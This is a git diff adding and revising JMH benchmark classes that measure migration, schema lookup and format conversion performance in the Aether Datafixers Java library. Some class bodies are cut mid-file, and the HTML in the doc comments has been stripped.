+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.concurrent;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.DataVersion;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.DataFixer;
+import de.splatgames.aether.datafixers.api.schema.Schema;
+import de.splatgames.aether.datafixers.api.schema.SchemaRegistry;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
+import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import de.splatgames.aether.datafixers.core.schema.SimpleSchemaRegistry;
+import de.splatgames.aether.datafixers.testkit.factory.MockSchemas;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Threads;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.Random;
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for concurrent migration and registry access performance.
+ *
+ *
Measures the thread-safety and contention characteristics of the
+ * DataFixer and SchemaRegistry under concurrent load.
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
+@OutputTimeUnit(TimeUnit.MICROSECONDS)
+@State(Scope.Benchmark)
+@Warmup(iterations = 3, time = 2, timeUnit = TimeUnit.SECONDS)
+@Measurement(iterations = 5, time = 2, timeUnit = TimeUnit.SECONDS)
+@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
+public class ConcurrentMigrationBenchmark {
+
+ @Param({"SMALL", "MEDIUM"})
+ private PayloadSize payloadSize;
+
+ // Shared state across threads
+ private DataFixer sharedFixer;
+ private DataFixer sharedChainFixer;
+ private SchemaRegistry sharedRegistry;
+ private DataVersion fromVersion;
+ private DataVersion toVersion;
+ private DataVersion chainToVersion;
+ private DataVersion[] registryVersions;
+
+ @Setup(Level.Trial)
+ public void setup() {
+ // Create shared fixer (thread-safe after freeze)
+ this.sharedFixer = BenchmarkBootstrap.createSingleFixFixer();
+ this.sharedChainFixer = BenchmarkBootstrap.createChainFixer(10);
+ this.fromVersion = new DataVersion(1);
+ this.toVersion = new DataVersion(2);
+ this.chainToVersion = new DataVersion(11);
+
+ // Create shared registry
+ final SimpleSchemaRegistry registry = new SimpleSchemaRegistry();
+ this.registryVersions = new DataVersion[100];
+ for (int i = 0; i < 100; i++) {
+ final int version = (i + 1) * 10;
+ this.registryVersions[i] = new DataVersion(version);
+ registry.register(MockSchemas.minimal(version));
+ }
+ registry.freeze();
+ this.sharedRegistry = registry;
+ }
+
+ /**
+ * Per-thread state for independent test data.
+ */
+ @State(Scope.Thread)
+ public static class ThreadState {
+
+ private Dynamic threadInput;
+ private Random random;
+
+ @Setup(Level.Iteration)
+ public void setup(final ConcurrentMigrationBenchmark parent) {
+ // Each thread gets its own input data
+ this.threadInput = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, parent.payloadSize);
+ this.random = new Random();
+ }
+ }
+
+ // ==================== Concurrent Migration ====================
+
+ /**
+ * Benchmarks concurrent single-fix migrations using all available processors.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(Threads.MAX)
+ public void concurrentSingleFix(final ThreadState state, final Blackhole blackhole) {
+ final Dynamic result = this.sharedFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ state.threadInput,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks concurrent chain migrations using all available processors.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(Threads.MAX)
+ public void concurrentChainMigration(final ThreadState state, final Blackhole blackhole) {
+ final Dynamic result = this.sharedChainFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ state.threadInput,
+ this.fromVersion,
+ this.chainToVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks concurrent migrations with 4 threads.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(4)
+ public void fourThreadMigration(final ThreadState state, final Blackhole blackhole) {
+ final Dynamic result = this.sharedFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ state.threadInput,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks concurrent migrations with 8 threads.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(8)
+ public void eightThreadMigration(final ThreadState state, final Blackhole blackhole) {
+ final Dynamic result = this.sharedFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ state.threadInput,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ // ==================== Concurrent Registry Access ====================
+
+ /**
+ * Benchmarks concurrent schema registry lookups.
+ *
+ * @param state per-thread state
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(Threads.MAX)
+ public void concurrentRegistryLookup(final ThreadState state, final Blackhole blackhole) {
+ final int index = state.random.nextInt(this.registryVersions.length);
+ final Schema schema = this.sharedRegistry.get(this.registryVersions[index]);
+ blackhole.consume(schema);
+ }
+
+ /**
+ * Benchmarks concurrent latest schema access.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ @Threads(Threads.MAX)
+ public void concurrentLatestLookup(final Blackhole blackhole) {
+ final Schema schema = this.sharedRegistry.latest();
+ blackhole.consume(schema);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
new file mode 100644
index 0000000..90818ff
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
@@ -0,0 +1,149 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.core;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.DataVersion;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.DataFixer;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
+import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for multi-fix chain migration performance.
+ *
+ *
Measures the performance of applying multiple sequential fixes,
+ * simulating real-world migration scenarios where data may need to
+ * traverse many version upgrades.
All fixes in the chain perform the same operation type (rename),
+ * measuring sequential fix application overhead.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void renameChain(final Blackhole blackhole) {
+ final Dynamic result = this.chainFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.input,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks applying a chain of mixed fix types.
+ *
+ *
Includes rename, add, remove, and transform operations
+ * for more realistic migration scenarios.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void mixedChain(final Blackhole blackhole) {
+ if (this.mixedFixer == null) {
+ // Skip for fixCount < 4
+ blackhole.consume(this.input);
+ return;
+ }
+ final Dynamic result = this.mixedFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.input,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks partial migration (half the chain).
+ *
+ *
Measures performance when migrating to an intermediate version
+ * rather than the latest version.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void partialChain(final Blackhole blackhole) {
+ final int halfwayVersion = Math.max(2, (this.fixCount / 2) + 1);
+ final Dynamic result = this.chainFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.input,
+ this.fromVersion,
+ new DataVersion(halfwayVersion));
+ blackhole.consume(result);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
new file mode 100644
index 0000000..d895b69
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -0,0 +1,148 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.core;
+
+import de.splatgames.aether.datafixers.api.DataVersion;
+import de.splatgames.aether.datafixers.api.schema.Schema;
+import de.splatgames.aether.datafixers.api.schema.SchemaRegistry;
+import de.splatgames.aether.datafixers.core.schema.SimpleSchemaRegistry;
+import de.splatgames.aether.datafixers.testkit.factory.MockSchemas;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.Random;
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for schema registry lookup performance.
+ *
+ *
Measures the performance of {@link SchemaRegistry#get(DataVersion)}
+ * with varying registry sizes. Uses floor semantics (finds greatest version
+ * less than or equal to requested).
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
+@OutputTimeUnit(TimeUnit.NANOSECONDS)
+@State(Scope.Benchmark)
+@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
+@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
+@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
+public class SchemaLookupBenchmark {
+
+ @Param({"10", "50", "100", "500"})
+ private int schemaCount;
+
+ private SchemaRegistry registry;
+ private DataVersion[] versions;
+ private DataVersion[] lookupVersions;
+ private Random random;
+
+ @Setup(Level.Trial)
+ public void setup() {
+ // Create registry with specified number of schemas
+ final SimpleSchemaRegistry simpleRegistry = new SimpleSchemaRegistry();
+ this.versions = new DataVersion[this.schemaCount];
+
+ for (int i = 0; i < this.schemaCount; i++) {
+ final int version = (i + 1) * 10; // 10, 20, 30, ...
+ this.versions[i] = new DataVersion(version);
+ simpleRegistry.register(MockSchemas.minimal(version));
+ }
+ simpleRegistry.freeze();
+ this.registry = simpleRegistry;
+
+ // Create lookup versions (including versions between registered versions)
+ this.lookupVersions = new DataVersion[this.schemaCount * 2];
+ for (int i = 0; i < this.lookupVersions.length; i++) {
+ this.lookupVersions[i] = new DataVersion((i + 1) * 5); // 5, 10, 15, ...
+ }
+
+ this.random = new Random(42); // Fixed seed for reproducibility
+ }
+
+ /**
+ * Benchmarks looking up an exact registered version.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void exactLookup(final Blackhole blackhole) {
+ final int index = this.random.nextInt(this.schemaCount);
+ final Schema schema = this.registry.get(this.versions[index]);
+ blackhole.consume(schema);
+ }
+
+ /**
+ * Benchmarks looking up a version using floor semantics.
+ *
+ *
Half of the lookups will be for exact versions, half will
+ * require floor resolution.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void floorLookup(final Blackhole blackhole) {
+ final int index = this.random.nextInt(this.lookupVersions.length);
+ final Schema schema = this.registry.get(this.lookupVersions[index]);
+ blackhole.consume(schema);
+ }
+
+ /**
+ * Benchmarks getting the latest schema.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void latestLookup(final Blackhole blackhole) {
+ final Schema schema = this.registry.latest();
+ blackhole.consume(schema);
+ }
+
+ /**
+ * Benchmarks sequential lookup of all versions.
+ *
+ *
Measures cache-friendly access patterns.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void sequentialLookup(final Blackhole blackhole) {
+ for (final DataVersion version : this.versions) {
+ final Schema schema = this.registry.get(version);
+ blackhole.consume(schema);
+ }
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
new file mode 100644
index 0000000..9e61504
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -0,0 +1,132 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.core;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.DataVersion;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.DataFixer;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
+import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for single DataFix application performance.
+ *
+ *
Measures the overhead of applying a single fix to data of varying sizes.
+ * Includes a baseline identity fix measurement to isolate framework overhead.
Measures framework overhead without actual data transformation.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void identityFix(final Blackhole blackhole) {
+ final Dynamic result = this.identityFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.input,
+ this.fromVersion,
+ this.toVersion);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks applying a fix to player-like data structure.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void playerDataFix(final Blackhole blackhole) {
+ final Dynamic playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
+ final DataFixer playerFixer = BenchmarkBootstrap.createPlayerFixer();
+ final Dynamic result = playerFixer.update(
+ BenchmarkBootstrap.PLAYER_TYPE,
+ playerInput,
+ new DataVersion(1),
+ new DataVersion(2));
+ blackhole.consume(result);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
new file mode 100644
index 0000000..b725afa
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -0,0 +1,187 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.format;
+
+import com.fasterxml.jackson.databind.JsonNode;
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
+import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
+import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps;
+import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for cross-format conversion performance.
+ *
+ *
Measures the overhead of converting data between different
+ * DynamicOps implementations using {@link DynamicOps#convertTo}.
Measures the overhead of applying a single fix to data of varying sizes.
- * Includes a baseline identity fix measurement to isolate framework overhead.
+ * Includes a baseline identity fix measurement to isolate framework overhead from actual transformation costs.
+ *
+ *
Benchmark Methods
+ *
+ *
{@link #identityFix} - Baseline measurement with no-op transformation
+ *
{@link #singleRenameFix} - Single field rename operation
+ *
{@link #playerDataFix} - Complex object transformation with codec roundtrip
+ *
{@link #playerDataFixEndToEnd} - Full pipeline including setup overhead
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for statistical significance)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Microseconds
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Throughput (ops/us): Higher is better. Operations per microsecond.
+ *
Average Time (us/op): Lower is better. Microseconds per operation.
+ *
Error (±): 99.9% confidence interval. Smaller means more stable results.
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar SingleFixBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar SingleFixBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific payload size only
+ * java -jar benchmarks.jar SingleFixBenchmark -p payloadSize=SMALL
+ * }
Measures the performance of renaming one field in the input data.
+ * This represents a common, lightweight migration operation. The benchmark is parameterized by {@link PayloadSize}
+ * to measure scaling behavior.
+ *
+ * @param s the shared benchmark state containing fixer and input data
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void singleRenameFix(final SizedState s, final Blackhole blackhole) {
+ blackhole.consume(s.fixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ s.input,
+ s.fromVersion,
+ s.toVersion));
}
/**
- * Benchmarks applying a single rename field fix.
+ * Benchmarks the identity (no-op) fix as a baseline measurement.
+ *
+ *
Measures pure framework overhead without any actual data transformation.
+ * Use this as a baseline to calculate the true cost of transformations by subtracting identity time from other
+ * benchmark results.
*
+ * @param s the shared benchmark state containing identity fixer and input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void singleRenameFix(final Blackhole blackhole) {
- final Dynamic result = this.fixer.update(
+ public void identityFix(final SizedState s, final Blackhole blackhole) {
+ blackhole.consume(s.identityFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- this.input,
- this.fromVersion,
- this.toVersion);
- blackhole.consume(result);
+ s.input,
+ s.fromVersion,
+ s.toVersion));
}
/**
- * Baseline benchmark with identity fix (no transformation).
+ * Benchmarks a complex player data transformation with codec roundtrip.
*
- *
Measures framework overhead without actual data transformation.
+ *
Measures the performance of a realistic migration scenario where data
+ * is decoded via codec, transformed, and re-encoded. This represents the upper bound of migration cost for complex
+ * object transformations.
*
+ *
Expected performance: ~17-18 μs/op (significantly slower due to codec overhead)
+ *
+ *
The ~70x slowdown compared to {@link #singleRenameFix} is expected and
+ * acceptable, as codec roundtrips involve reflection, object instantiation, and full serialization/deserialization
+ * cycles.
+ *
+ * @param s the shared player benchmark state
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void identityFix(final Blackhole blackhole) {
- final Dynamic result = this.identityFixer.update(
- BenchmarkBootstrap.BENCHMARK_TYPE,
- this.input,
- this.fromVersion,
- this.toVersion);
- blackhole.consume(result);
+ public void playerDataFix(final PlayerState s,
+ final Blackhole blackhole) {
+ blackhole.consume(s.playerFixer.update(
+ BenchmarkBootstrap.PLAYER_TYPE,
+ s.playerInput,
+ s.fromVersion,
+ s.toVersion));
}
/**
- * Benchmarks applying a fix to player-like data structure.
+ * Benchmarks the complete end-to-end pipeline including setup overhead.
+ *
+ *
Measures the total cost of a migration including:
+ *
+ *
Test data generation
+ *
DataFixer bootstrap and initialization
+ *
Actual migration execution
+ *
+ *
+ *
This benchmark is useful for understanding cold-start performance
+ * and the cost of creating new DataFixer instances. In production code,
+ * DataFixers should be reused rather than recreated per-operation.
+ *
+ *
Note: Results will be significantly slower than {@link #playerDataFix}
+ * due to setup overhead included in each iteration.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void playerDataFix(final Blackhole blackhole) {
+ public void playerDataFixEndToEnd(final Blackhole blackhole) {
final Dynamic playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
final DataFixer playerFixer = BenchmarkBootstrap.createPlayerFixer();
- final Dynamic result = playerFixer.update(
+ blackhole.consume(playerFixer.update(
BenchmarkBootstrap.PLAYER_TYPE,
playerInput,
new DataVersion(1),
- new DataVersion(2));
- blackhole.consume(result);
+ new DataVersion(2)));
+ }
+
+ /**
+ * Shared JMH state for benchmarks parameterized by payload size.
+ *
+ *
This state is shared across all threads within a benchmark trial
+ * ({@link Scope#Benchmark}). The {@link #payloadSize} parameter controls the complexity of test data:
+ *
+ *
+ *
SMALL: 5 fields, 2 nesting levels, 10 array elements
+ *
MEDIUM: 20 fields, 4 nesting levels, 100 array elements
+ *
LARGE: 50 fields, 6 nesting levels, 1000 array elements
+ *
+ *
+ * @see PayloadSize
+ */
+ @State(Scope.Benchmark)
+ public static class SizedState {
+
+ /**
+ * The payload size parameter, injected by JMH. Controls the complexity of generated test data.
+ */
+ @Param({"SMALL", "MEDIUM", "LARGE"})
+ public PayloadSize payloadSize;
+
+ /**
+ * DataFixer configured with a single field rename fix (v1 → v2).
+ */
+ public DataFixer fixer;
+
+ /**
+ * DataFixer configured with an identity (no-op) fix for baseline measurement.
+ */
+ public DataFixer identityFixer;
+
+ /**
+ * Pre-generated input data matching {@link #payloadSize}.
+ */
+ public Dynamic input;
+
+ /**
+ * Source version for migrations (v1).
+ */
+ public DataVersion fromVersion;
+
+ /**
+ * Target version for migrations (v2).
+ */
+ public DataVersion toVersion;
+
+ /**
+ * Initializes the benchmark state once per trial.
+ *
+ *
Creates fixers and generates test data based on the current
+ * {@link #payloadSize} parameter value.
This state is separate from {@link SizedState} because the player benchmark
+ * uses a fixed, realistic data structure rather than parameterized payload sizes. The player data simulates a
+ * typical game entity with nested objects, arrays, and various field types.
+ *
+ *
The player fix performs a complete codec roundtrip transformation,
+ * making it representative of real-world migration scenarios where data is decoded, transformed, and
+ * re-encoded.
+ *
+ * @see BenchmarkBootstrap#createPlayerFixer()
+ * @see BenchmarkDataGenerator#generatePlayerData
+ */
+ @State(Scope.Benchmark)
